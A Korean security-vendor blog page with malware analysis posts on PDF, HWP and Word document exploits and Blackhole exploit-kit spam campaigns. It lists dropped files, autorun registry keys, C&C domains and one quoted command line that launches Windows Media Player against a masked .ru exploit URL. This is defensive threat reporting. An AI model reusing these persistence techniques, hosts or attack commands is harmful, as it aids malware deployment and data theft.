어도비(Adobe)에서는 현지 시각으로 2월 13일 어도비 리더(Reader)와 아크로뱃(Acrobat)에 존재하는 취약점인 CVE-2013-0640 및 CVE-2013-0641를 악용한 타깃 공격(Targeted Attack)이 발생하였음을 보안 권고문 "Security Advisory for Adobe Reader and Acrobat"를 통해 밝혔다.


이 번에 발견된 2개의 어도비 리더와 아크로뱃 취약점은 기존에 알려지지 않은 제로 데이(Zero-Day, 0-Day) 취약점으로 현재까지 해당 취약점들을 제거할 수 있는 보안 패치가 제공되지 않고 있다.


ASEC에서 파악한 바로는 해당 제로 데이 취약점들은 아프가니스탄을 중심으로 한 중동 지역을 대상으로 한 타깃 공격(Targeted Attack) 형태로 이메일의 첨부 파일로 공격이 진행되었다.


어도비에서는 해당 취약점들에 영향을 받는 어도비 리더와 아크로뱃 버전들은 다음과 같음을 밝히고 있다.


윈도우(Windows) 및 맥킨토시(Macintosh) Adobe Reader XI (11.0.01 및 이전 버전)

윈도우(Windows) 및 맥킨토시(Macintosh) Adobe Reader X (10.1.5  및 이전 버전)

윈도우(Windows), 맥킨토시(Macintosh) 및 리눅스(Linux) Adobe Reader 9.5.3 및 이전 버전

윈도우(Windows), 맥킨토시(Macintosh) Adobe Acrobat XI (11.0.01 및 이전 버전)

윈도우(Windows), 맥킨토시(Macintosh)Adobe Acrobat X (10.1.5 및 이전 버전)

윈도우(Windows), 맥킨토시(Macintosh) Adobe Acrobat 9.5.3 및  9.x 버전


이 번에 발견된 해당 제로 데이 취약점들은 어도비 리더 및 아크로뱃에서 XML 처리를 위해 사용되는 "AcroForm.api" 모듈에서 발생하는 힙 스프레이 오버플로우(Heap-spray overflow) 취약점이다.


이 번 어도비 리더와 아크로뱃에 존재하는 제로 데이 취약점들은 이메일의 첨부 파일 형태로 "Visaform Turkey.pdf (828,744 바이트)"라는 파일명으로 공격에 사용되었다.


해당 제로 데이 취약점들을 악용하는 취약한 PDF 파일을 열게 되면 아래 이미지와 동일한 내용을 가지고 있다.



타깃 공격에 사용된 제로 데이 취약점을 악용한 PDF 파일은 아래 이미지와 동일한 구조를 가지고 있으며, 첫 번째 스트림(Stream)에는 D.T (3,644 바이트) 파일이 암호화 되어 있고, 두 번째 스트림에는 L2P.T (366,926 바이트) 파일이 암호화 되어 존재한다.


그리고 아래 이미지와 동일하게 b5h에서부터 해당 취약한 PDF 문서를 여는데 사용한 어도비 리더와 아크로뱃의 버전을 확인하는 코드가 포함되어 있다.



해당 어도비 리더와 아크로뱃의 버전을 확인하는 코드는 다음 버전을 사용 중인지 확인하게 된다.


10.0.1.434

10.1.0.534

10.1.2.45

10.1.3.23

10.1.4.38

10.1.4.38ARA

10.1.5.33

11.0.0.379

11.0.1.36

9.5.0.270

9.5.2.0

9.5.3.305


만약 해당 취약한 PDF를 열었는 어도비 리더 및 아크로뱃이 해당 버전들에 해당 되지 않을 경우에는 아래 오류 메시지를 발생 후 종료하게 된다.



그리고 해당 취약한 PDF 파일은 아래 이미지와 동일하게 6F932h에서부터 난독화된 자바스크립트(Javascript)가 존재한다.



이 번 어도비 리더와 아크로뱃에 존재하는 제로 데이 취약점들을 악용한 공격의 전체적인 구조는 다음 이미지와 동일하다.



해당 제로 데이 취약점을 악용하는 취약한 PDF 파일을 열게 되면, D.T (46,080 바이트)라는 파일명을 가지는 DLL 파일이 다음 경로에 생성된다.


c:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\acrord32_sbx\D.T


생성된 D.T (46,080 바이트)는 다시 L2P.T (453,632 바이트) 파일명을 가지는 DLL 파일을 다음 경로에 생성하게 된다.


c:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\acrord32_sbx\L2P.T


L2P.T (453,632 바이트)는 취약점이 존재하지 않은 정상 PDF 문서인 Visaform Turkey.pdf (77,210 바이트)를 생성하여 해당 취약한 PDF 파일을 열었던 PC 사용자들에게 정상 파일처럼 보이게 만든다.


c:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\Visaform Turkey.pdf


그리고 L2P.T (453,632 바이트)는 외부 네트워크 연결이 가능한지 다음 도메인으로 접속으로 시도한다.


www.google.com/param 


감염된 시스템이 32비트(Bit) 운영체제 또는 64비트(Bit) 운영체제인지를 확인한 후, 32비트 윈도우 운영체제 일 경우에는 LangBar32.dll (250,880 바이트)을 생성하고, 64비트 윈도우 운영체제 일 경우에는 LangBar64.dll (219,648 바이트)를 다음 경로에 생성하게 된다.


c:\documents and settings\[사용자 계정명]\local settings\application data\cache\LangBar32.dll 


C:\Users\[사용자 계졍명]\AppData\Local\cache\LangBar64.dll 


그리고 감염된 시스템이 재부팅하더라도 자동 실행을 위해 레지스트리에 다음과 같은 키 값을 생성하게 된다.


HKEY_CURRENT_USER\Software\Microsoft\CTF\LangBarAddIn\{CLSID}

= C:\Documents and Settings\[사용자 계정]\Local Settings\Application Data\cache\LangBar32.dll


생성된 LangBar32.dll (250,880 바이트) 또는 LangBar64.dll (219,648 바이트)는 다음의 시스템으로 접속을 시도하게 된다.


bolsilloner.es/index.php


접속이 성공하게 될 경우에는 해당 시스템에서 특정 파일들을 다운로드 하여 lbarext32.dll (236,544 바이트)와 lbarhlp32.dll (269,824 바이트) 파일명의 DLL 파일들을 생성하게 된다.


생성된 해당 lbarext32.dll (236,544 바이트)와 lbarhlp32.dll (269,824 바이트)는 감염된 시스템에서 다음 정보들을 수집하여 kmt32.pod에 기록하게 된다.


실행 중인 프로세스 리스트

실행 중인 프로그램의 윈도우 명

사용자가 입력하는 키보드 입력 값


해당 어도비 리더와 아크로뱃에 존재하는 제로 데이 취약점을 악용한 공격은 악성코드 생성 및 악용한 취약점의 형태를 보았을 때 2월 7일 공개된 "어도비 플래쉬 플레이어 CVE-2013-0633 및 CVE-2013-0634 취약점 악용"과 동일한 그룹에 의해 제작되었을 것으로 추정된다.


이 번에 발견된 어도비 리더 및 아크로뱃에 존재하는 제로 데이 취약점을 악용한 악성코드들은 V3 제품 군에서 다음과 같이 진단한다.


PDF/Exploit

Win-Trojan/Itaduke.46080

Win-Trojan/Itaduke.453632

Win-Trojan/Itaduke.250880

Win64-Trojan/Itaduke.219648

Win-Trojan/Itaduke.236544 

Win-Trojan/Itaduke.269824


APT 전문 대응 솔루션인 트러스와쳐(TrusWatcher)에 포함된 DICA(Dynamic Intelligent Content Analysis)에 의해 시그니처 없이 아래와 같이 탐지가 가능하다.


Exploit/PDF.InScript_ZWF


어도비에서는 보안 패치를 배포하기 전까지 다음과 같은 임시 방안을 권고하고 있다. 아래 임시 방안은 윈도우(Windows) XP에 설치되어 있는 영문 어도비 리더를 기준으로 작성 되었다.


1) 어도비 리더 실행 후 상단의 [편집(Edit)] -> [기본 설정(Preferences)]을 클릭한다



2) [보안 고급(Security Enhanced)]를 클릭 후 상단의 [샌드 박스 보호(Sandbox Protections]에서 [제한된 보기(Protected View)]에서 [안전하지 않을 수 있는 위치의 파일(Files from potentially unsafe locations)]에 클릭한다.



앞서 언급한 바와 같이 현재 어도비에서는 해당 취약점들을 제거할 수 있는 보안 패치를 아직 배포하지 않고 있다. 현재 어도비에서는 보안팀 블로그 "Schedule update to Security Advisory for Adobe Reader and Acrobat (APSA13-02)"를 통해 현지 시각으로 2월 18일 보안 패치를 배포를 예정하고 있다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

 최근 취약한 PDF 파일이 국내 방산업체 직원을 사칭하여 내부 직원 대상으로 이메일 통해 유포된 것이 보고되었다. PDF 파일의 내용을 보면 알 수 있듯이 사회공학적 기법을 이용하여, 방산진흥본부에서 방산업체로 업무협조 문서를 발송한 것처럼 위장하고 있다.

 

[그림 1] PDF 파일 내용

 

해당 PDF 파일은 지난 2012년 8월에 ASEC 블로그의 "이메일을 이용한 어도비 CVE-2009-0927 취약점 악성코드 유포"와 유사한 형태로 공격자는 방산업체로 수신되는 문서를 이용하여 꾸준히 APT 공격을 하는 것으로 보인다.

이러한 공격으로 인해 내부 기밀 정보가 외부 공격자에게 유출되는 피해가 발생할 수 있기 때문에 국가 기관 및 방산업체에서는 심각하게 받아들여지고 있다. 따라서, 이와 같은 보안 위협에 대한 대응이 필요하다.

 

방산업체 직원으로 사칭해서 유포된 이메일의 첨부파일은 다음과 같다.

[그림 2] 이메일 첨부파일

 

"업무연락 근무시간 관련 업계 현황 조사 협조요청_20130130.pdf" 파일을 실행하면 아래와 같이 파일과 레지스트리 키를 생성하여 webios.dll 파일이 6to4 Manager 이름으로 서비스에 등록되어 시스템 시작 시 마다 자동 실행되도록 한다.

 

[파일 생성]

C:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\AdobeARM.dll

C:\WINDOWS\system32\webios.dll

C:\WINDOWS\system32\wdiguest.dll

 

[레지스트리 등록]

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Parameters\ServiceDll

"C:\WINDOWS\system32\webios.dll"

 

[그림 3] 6to Manager 서비스 등록 상태

 

webios.dll 파일과 wdiguest.dll 파일은 동일한 파일이며, webios.dll 파일은 svchost.exe 프로세스에 로드 되어 동작하며, 미국에 위치하는 C&C 서버로 주기적으로 접속을 시도하는 것으로 확인된다.

 

hxxp://yy**.**.nu (173.2**.***.202, US)

 

[그림 4] 173.2**.***.202 접속 시도 패킷

 

C&C 서버와 정상적인 통신에 성공하게 된다면 공격자의 명령에 따라 키보드 입력을 가로채는 키로깅과 원격 제어 등의 기능을 수행하게 된다.

 

V3 제품에서는 아래와 같이 진단이 가능하다.

 

<V3 제품군의 진단명>

PDF/Exploit

Trojan/Win32.Dllbot

Win-Trojan/Dllbot.8704.E

신고
Creative Commons License
Creative Commons License
Posted by DH, L@@

안랩 ASEC에서 2012년 10월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2012 Vol.34을 발간하였다. 



이 번에 발간된 ASEC 리포트는 2012년 10월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

10월에 발견된 취약한 한글 문서 파일

MS 워드, PDF 문서들의 취약점을 악용하는 악성코드 다수 발견

한글 소프트웨어의 제로데이 취약점 악용 악성코드

미국 대선 뉴스로 위장한 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷

플레임 악성코드 변형 miniFlame 변형 발견

윈도우 도움말 파일을 이용한 악성코드 유포

국방 관련 내용을 담은 취약한 한글 파일

연봉 계약서로 위장한 취약한 한글 파일 발견

한반도 정황 관련 내용의 취약한 한글 파일 발견

대만 기상청을 대상으로 한 타깃 공격 발견

이스라엘 정부 기관 대상의 타깃 공격 발생

국내 PC 사용자를 대상으로 유포된 아두스카 부트킷

usp10.dll 파일을 이용한 온라인 게임 악성코드


2) 모바일 악성코드 이슈

NH모바일 웹 피싱사이트

방통위 사칭 악성 애플리케이션


3) 악성코드 분석 특집

패치드(Patched) 형태의 악성코드 변천사

ZeroAccess로도 알려진 Smiscer 변형

IFEO 를 이용하는 악성코드

Bootkit Story Part 1. 모체를 찾아라!


4) 보안 이슈

Adobe사의 유출된 code signing 악용사례 발생

미국 금융 기업 DDoS 공격

개인 금융 정보 탈취를 노리는 Banki 트로이목마 변형


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2012 Vol.34 발간


저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 2009년부터 익스플로잇 툴킷(Web Exploit Toolkit)이라는 웹을 기반으로 하여 웹 브라우저(Web Browser)나 웹 기반 애플리케이션(Web Application)들에 존재하는 취약점들을 자동으로 악용하도록 제작된 툴킷의 위험성에 대해 언급하였다.


그리고 웹 익스플로잇 투킷의 한 종류인 블랙홀(Blackhole) 웹 익스플로잇 툴킷을 이용하여 실제 사회적 주요 이슈나 소셜 네트워크(Social Network)와 같은 일반 사람들이 관심을 가질 만한 내용들을 포함한 스팸 메일(Spam Mail)의 사회 공학(Social Engineering) 기법으로 악성코드 유포를 시도한 사례들이 다수 존재한다.


2012년 6월 - 스팸 메일과 결합된 웹 익스플로잇 툴킷


2012년 7월 - 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷


2012년 8월 - 페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷


특히 올해 2012년 4분기에는 미국과 한국에는 대통령 선거라는 정치적인 중요한 이슈가 존재하다. 이러한 중요한 이슈를 악용하여 스팸 메일에 존재하는 악의적인 웹 사이트 링크로 유도하는 사례가 발견되었다.


이 번에 발견된 스팸 메일 사례에는 아래 이미지와 같이 미국 대통령 선거의 후보 중 한 명인 미트 롬니(Mitt Romney)가 60% 차이로 앞서고 있다는 허위 사실을 포함하여, 하단에 존재하는 웹 사이트 링크를 클릭하도록 유도하고 있다.



해당 링크를 클릭하게 될 경우에는 블랙홀 웹 익스플로잇 툴킷의 악의적인 웹 사이트로 연결되도록 설정되어 있어, 사용하는 시스템에 웹 브러우저와 웹 애플리케이션에 취약점이 존재 할 경우에는 이를 악용하여 다른 악성코드의 감염을 시도하게 된다.


이 번에 발견된 미국 대통령 선거 뉴스로 위장한 스팸 메일을 통해 유포된 악성코드들은 V3 제품 군에서 다음과 같이 진단한다. 


PDF/Exploit

Java/Cve-2012-1723

Trojan/Win32.Pakes 


현재 웹 익스플로잇 툴킷을 이용하여 다양한 악성코드를 유포 중에 있음으로 각별한 주의가 필요하다. 그리고 향후에도 미국과 한국의 대통령 선거와 관련된 사회적 중요 이슈들을 악용한 보안 위협이 발생할 가능성이 높음으로 주의가 필요하다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

추석 연휴가 끝난 이후 ASEC에서는 최근 다양한 형태의 전자 문서들에 존재하는 취약점을 악용하는 악성코드들을 발견하였다.


전자 문서와 관련된 악성코드들이 발견되는 것이 이 번이 처음 발생한 사항이 아니지만, 마이크로소프트 워드(Microsoft Word), 한글 소프트웨어 그리고 어도비 리더(Adobe Reader) 파일인 PDF에 존재하는 알려진 취약점 등을 악용하는 악성코드가 동시 다발적으로 발견된 것은 특이 사항으로 볼 수 있다.


먼저 한글 소프트웨어와 관련된 악성코드는 크게 3가지 형태로 기존에 알려진 취약점을 악용하는 형태, 특이하게 내부에 악의적인 목적으로 제작된 자바 스크립트(Java Script)가 포함된 형태 그리고 한글 문서 자체가 특이한 OLE 포맷을 가지고 있는 형태가 발견되었다.


기존에 알려진 한글 취약점을 악용하는 취약한 한글 파일은 아래 이미지와 동일한 내용을 포함하고 있는 "붙임1_국방기술정보 위원명단_[2].hwp (1,061,892 바이트)"로 유포되었다.



해당 취약한 한글 파일은 HncApp.dll에 존재하는 문단 정보를 파싱하는 과정에서 발생하는 버퍼 오버플로우로 인한 임의의 코드 실행 취약점을 악용하고 있으며, 이는 기존에 알려진 취약점으로 이미 한글과 컴퓨터에서 보안 패치를 배포 중에 있다.


두 번째 발견된 취약한 한글 파일은 아래 이미지와 동일하게 문서 암호가 설정되어 있는 "122601.hwp (213,133 바이트)"와 동일 한 파일명에 파일 크기만 217,231 바이트로 다른 파일이 존재한다.


해당 한글 파일들의 내부에는 아래 이미지와 동일한 형태로 특이하게 자바 스크립트(Java Script)가 포함되어 있다.



내부에 포함되어 있는 해당 자바 스크립트 코드를 디코딩하게 되면, 특정 시스템에서 ie67.exe (99,328 바이트)의 다른 악성코드를 다운로드 후 실행하도록 되어 있다.


그리고 마지막으로 아래 이미지와 동일한 내용을 포함하고 있는 "실험 리포트.hwp (7,887,360 바이트)"라는 파이명으로 유포되었으나, 해당 문서를 여는 것만으로는 악성코드 감염 행위가 발생하지 않는다.



해당 한글 파일의 OLE 포맷을 보게되면 아래 이미지와 동일하게 기존에 발견된 특이항 형태의 섹션명이 포함된 한글 파일과 유사한 형태를 가지고 있다.



어도비 아크로뱃(Adobe Acrobat)에 존재하는 알려진 취약점을 악용하는 PDF 파일은 아래 이미지와 동일한 내용을 포함하고 있는 "안보현안분석.pdf  (679,753 바이트)" 파일명으로 유포 되었다.



해당 취약한 PDF 파일은 기존에 알려진 CVE-2009-0927 취약점을 악용하고 있으며, 2009년 3월 어도비에서 보안 권고문 "APSB09-04 Security Updates available for Adobe Reader and Acrobat"을 통해 이미 보안 패치가 배포 중에 있다.


마지막으로 발견된 마이크로소프트 워드에 존재하는 취약점을 악용하는 취약한 워드 파일은 유포 당시의 정확한 파일명은 확인 되지 않지만, 265,395 바이트의 크기를 가지고 있다.


그리고 해당 워드 파일은 CVE-2012-0158 취약점을 악용하며 보안 권고문 "Microsoft Security Bulletin MS12-027 - 긴급 Windows 공용 컨트롤의 취약점으로 인한 원격 코드 실행 문제점 (2664258)" 을 통해 이미 보안 패치가 배포 중인 알려진 취약점이다.


마이크로소프트 워드, 한글 소프트웨어 그리고 어도비 리더에 존재하는 취약점들을 악용하여 악성코드 감염을 시도하는 악성코드들 모두 V3 제품군에서 다음과 같이 진단한다.


HWP/Exploit

Dropper/Exploit-HWP

Dropper/Cve-2012-0158

PDF/Exploit

Backdoor/Win32.PcClient

Dropper/Win32.OnlineGameHack 

Win-Trojan/Infostealer.28672.K

Win-Trojan/Infostealer.81920.B


APT 전문 대응 솔루션인 트러스와쳐(TrusWatcher)에 포함된 DICA(Dynamic Intelligent Content Analysis)에 의해 시그니처 없이 아래와 같이 탐지가 가능하다.


Exploit/HWP.AccessViolation-SEH

Exploit/DOC.AccessViolation-DE


향후 출시 예정인 V3 인터넷 시큐리티(Internet Security) 9.0 에 포함 예정인 ASD 2.0의 MDP 엔진에서도 시그니처 없이 다음과 같이 탐지가 가능하다.


Dropper/MDP.Document


앞서 언급한 바와 같이 이 번에 발견된 취약한 전자 문서 파일들은 모두 기존에 알려진 취약점들을 악용하고 있으며, 마이크로소프트, 한글과 컴퓨터 그리고 어도비에서 모두 해당 취약점들을 제거할 수 있는 보안 패치들을 배포 중에 있다.


그러므로 향후 유사한 보안 위협들로 인한 피해를 예방하기 위해서는 관련 보안 패치를 설치하는 것이 중요하다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 2012년 8월 21일 어제 CVE-2009-0927 취약점을 악용하는 어도비 리더(Adobe Reader) 파일인 PDF 파일이 이메일에 첨부되어 국내에 유포된 사실을 확인 하였다.


해당 CVE-2009-0927 취약점은 2009년 3월 어도비에서 보안 권고문 "APSB09-04 Security Updates available for Adobe Reader and Acrobat"을 통해 이미 보안 패치가 배포 중인 취약점이다. 그리고 해당 취약점을 악용하여 취약한 PDF 파일을 유포하는 공격 형태는 2009년 10월부터 지속적으로 발견되어 왔다.


2009년 10월 9일 - 어도비 PDF 제로 데이 취약점 공격 악성코드 발견


2009년 10월 16일 - 새로운 어도비 취약점 웹 사이트를 통해 유포


2009년 11월 10일 - 타켓 공격에 악용된 취약한 PDF 악성코드


2010년 11월 25일 - 이메일로 유포된 랜섬웨어를 다운로드하는 제우스


이 번에 발견된  CVE-2009-0927 취약점을 악용하는 취약한 PDF 파일은 이메일에 첨부된 형태로 유포되었으며, 동일한 취약점을 파일명과 문서 내용만을 변경하여 유포되었다.


현재 확인된 취약한 PDF 파일은 총 2개로 열게 되면 아래 이미지와 같은 내용들이 보여진다.


공문국방무기체계사업관리교육9월교육과정입교희망자파악.pdf (408,766 바이트)



공문과학적사업관리기법확대적용및EVMTool소개교육안내.pdf (458,902 바이트)



해당 문서들을 어도비에서 배포한 보안 패치를 설치하지 않은 취약한 버전의 어도비 리더를 사용하는 시스템에서 열어보게 될 경우 AdobeARM.dll (32,768 바이트)와 webios.dll (8,704 바이트) 파일들이 생성된다.


C:\Documents and Settings\[사용자 계정명]\Local Settings\Temp\AdobeARM.dll

C:\WINDOWS\system32\webios.dll


다음의 레지스트리 키를 생성하여 생성한 webios.dll (8,704 바이트) 를 윈도우 서비스로 등록하여 감염된 시스템이 재부팅 되더라도 자동 실행되도록 구성한다.

HKLM\SYSTEM\ControlSet001\Services\6to4\Parameters\ServiceDll 
= "C:\WINDOWS\system32\webios.dll"     

그리고 감염된 시스템에 존재하는 정상 svchost.exe 파일을 로드하여 webios.dll (8,704 바이트) 을  해당 정상 svchost.exe의 프로세스에 인젝션하게 된다. 스레드 인젝션이 성공하게 되면 미국에 위치한 특정 시스템으로 접속을 시도하게 된다.

미국에 위치한 특정 시스템과 정상적인 통신에 성공하게 된다면 공격자의 명령에 따라 키보드 입력을 가로채는 키로깅(Keylogging)과 원격 제어 등의 기능을 수행하게 된다.

이번 방위산업 관련 문서 내용을 가지고 있는 CVE-2009-0927 취약점을 악용하는 어도비 리더 PDF 파일과 관련 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.

PDF/Exploit
Trojan/Win32.Dllbot 
Win-Trojan/Dllbot.8704

APT 전문 대응 솔루션인 트러스와쳐(TrusWatcher)에 포함된 DICA(Dynamic Intelligent Content Analysis)에 의해 시그니처 없이 탐지가 가능하다.

향후 출시 예정인 V3 인터넷 시큐리티(Internet Security) 9.0 에 포함 예정인 ASD 2.0의 MDP 엔진에서도 시그니처 없이 다음과 같이 탐지가 가능하다.

Dropper/MDP.Exploit (6)

앞서 언급한 바와 같이 이번에 발견된 CVE-2009-0927 취약점을 악용하는 어도비 리더 PDF 파일들은 2009년에 발견된 취약점을 악용하고 있으며, 이미 어도비에서 보안 패치를 배포 중에 있다.

그러므로 어도비에서 배포하는 보안 패치 설치를 통해 해당 CVE-2009-0927 취약점을 악용하는 악성코드의 감염외에도 다른 어도비 관련 취약점을 악용하는 악성코드들의 감염도 예방 할 수 있다.


저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

최근 들어 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴킷이 스팸 메일(Spam Mail)과 결합되어 유포되는 현상들이 자주 발견되고 있다.


최근 발견된 블랙홀 웹 익스플로잇 툴킷과 스팸 메일이 결합되어 유포된 사례들은 다음을 들 수가 있다.


2012년 6월 - 스팸 메일과 결합된 웹 익스플로잇 툴킷


2012년 7월 - 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 인터넷을 이용한 현금 결제 서비스인 페이팔(PayPal)의 결제 결과 안내 메일로 위장하여 유포되었다.


이 번에 발견된 페이팔 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



페이팔 결제 안내 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 페이팔 웹 페이지로 연결되는 것이 아니라 미국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 미국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 다른 말레이시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 기존 블랙홀 익스플로잇 툴킷과 동일한 포맷의 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 말레이시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.


그리고 해당 블랙홀 익스플로잇 툴킷에서는 아래의 취약점들 중 하나를 악용하게 된다.



해당 취약점이 성공적으로 악용되면 동일한 시스템에 존재하는 64b3bcf.exe (84,480 바이트)를 다운로드하여 wpbt0.dll (84,480 바이트) 명칭으로 생성하게 된다.


C:\Documents and Settings\[사용자 계정]\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (84,480 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe   (84,480 바이트) 명칭으로 복사하게 된다.


C:\Documents and Settings\[사용자 계정]\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\[사용자 계정]\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 explorer.exe 정상 프로세스의 스레드로 자신의 코드를 삽입한 후 다음의 정보들을 후킹하게 된다.

웹 사이트 접속 정보
FTP 시스템 접속 사용자 계정과 비밀 번호 정보
POP3 이용 프로그램 사용자 계정과 비밀 번호 정보
웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보

마지막으로 감염된 PC 사용자에게는 구글 메인 웹 페이지로 연결하여 정상적인 접속이 실패한 것으로 위장하게 된다.

이 번에 발견된 페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.

JS/Iframe
JS/Redirect
PDF/Cve-2010-0188
Win-Trojan/Agent.84480.HA

페이팔 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.

이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시 비영리 변경 금지
신고
Creative Commons License
Creative Commons License
Posted by 비회원

ASEC에서는 6월 5일 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴 킷이 스팸 메일(Spam Mail)과 결합되어 유포되었다는 사실을 밝힌 바가 있다.


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 사용자가 많은 유명 소셜 네트워크(Social Network) 서비스인 링크드인(LinkedIn)의 초대 메일로 위장하여 유포되었다.


이 번에 발견된 링크드인 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



링크드인의 초대 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 링크드인 웹 페이지로 연결되는 것이 아니라 중국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 중국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 웹 페이지 하단에는 다른 러시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 아래 이미지와 같이 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 러시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.



해당 블랙홀 웹 익스플로잇 툴킷에 성공적으로 연결하게 되면 웹 브라우저에 의해 CMD 명령으로 윈도우 미디어 플레이(Windows Media Player) 취약점을 악용하기 위한 시도를 하게 된다. 그러나 분석 당시 해당 취약점은 정상적으로 악용되지 않았다.


"C:\Program Files\Windows Media Player\wmplayer.exe" /open http://************.ru:8080/forum/data/hcp_asx.php?f=182b5"


그리고 두 번째로 자바(JAVA)와 인터넷 익스플로러(Internet Explorer)에 존재하는 알려진 취약점을 악용하기 위한 스크립트 파일이 실행된다.



세 번째로 어도비 아크로뱃 리더(Adobe Acrobat Reader)에 존재하는 알려진 취약점을 악용하기 위한 PDF 파일을 아래 이미지와 같이 다운로드 후 실행 하게 된다.



해당 링크드인 스팸 메일을 수신한 PC에 위에서 언급한 4개의 취약점 중 하나라도 존재 할 경우에는 동일한 시스템에서 wpbt0.dll (127,648 바이트)를 다운로드하여 다음 경로에 생성하게 된다.


C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (127,648 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe (127,648 바이트)라를 명칭으로 복사하게 된다.


C:\Documents and Settings\Tester\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\Tester\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 모든 정상 프로세스의 스레드로 자신의 코드 일부분을 삽입한 후 다음의 정보들을 후킹하게 된다.


웹 사이트 접속 정보

FTP 시스템 접속 사용자 계정과 비밀 번호 정보

POP3 이용 프로그램 사용자 계정과 비밀 번호 정보

웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보


감염된 PC에서 수집된 정보들 모두는 아래 이미지와 같이 악성코드 내부에 하드코딩 되어 있는 특정 시스템들으로 후킹한 데이터들 전부를 인코딩하여 전송하게 된다.



